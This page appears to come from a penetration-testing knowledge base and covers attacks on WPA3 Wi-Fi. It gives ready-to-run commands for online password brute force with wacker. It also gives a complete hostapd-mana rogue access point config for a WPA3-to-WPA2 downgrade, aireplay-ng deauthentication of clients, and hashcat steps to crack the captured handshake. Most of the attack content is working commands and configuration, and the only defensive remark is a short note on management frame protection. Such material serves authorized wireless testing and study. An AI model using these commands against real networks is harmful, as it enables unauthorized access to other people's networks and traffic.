Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

WPA3 introduces SAE (Simultaneous Authentication of Equals), replacing the PSK handshake with a protocol resistant to offline dictionary attacks. However, WPA3 networks can still be attacked through online brute force or by exploiting clients configured to accept both WPA2 and WPA3.

Online Brute Force (wacker)

WPA3 does not expose a crackable handshake, but online brute force is still possible, each attempt connects to the AP and tests a password directly. Slow but viable against weak passwords. 
cd ~/tools/wacker
./wacker.py --wordlist ~/rockyou-top100000.txt \
  --ssid <SSID> \
  --bssid <BSSID> \
  --interface wlan1 \
  --freq <FREQUENCY>

WPA3 → WPA2 Downgrade Attack

If the target AP supports both SAE and PSK (mixed mode), and clients are configured to accept WPA2, a rogue AP running WPA2 can capture the WPA2 handshake for offline cracking. Check the airodump-ng .csv for WPA2+SAE or PSK+SAE in the encryption column, this indicates a mixed-mode AP. hostapd-mana config to impersonate the AP with WPA2-only: 
interface=wlan1
driver=nl80211
hw_mode=g
channel=<CHANNEL>
ssid=<TARGET-SSID>
mana_wpaout=handshake.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678

hostapd-mana hostapd-downgrade.conf
Check if the AP has MFP (802.11w) enabled, if not, deauthenticate the client to force reconnection to the rogue AP: 
iwconfig wlan0mon channel <CHANNEL>
aireplay-ng wlan0mon -0 0 -a <REAL-BSSID> -c <CLIENT-MAC>
Once the handshake is captured, crack it: 
hashcat -a 0 -m 22000 handshake.22000 ~/rockyou.txt --force
Convert hccapx to 22000 first if needed: 
hcxhash2cap --hccapx=handshake.hccapx -c aux.pcap
hcxpcapngtool aux.pcap -o handshake.22000

Note on MFP (802.11w)

WPA3 mandates Management Frame Protection (MFP), which prevents deauthentication attacks. Check in Wireshark, if RSN Capabilities: MFP required is set, deauth will not work against that client.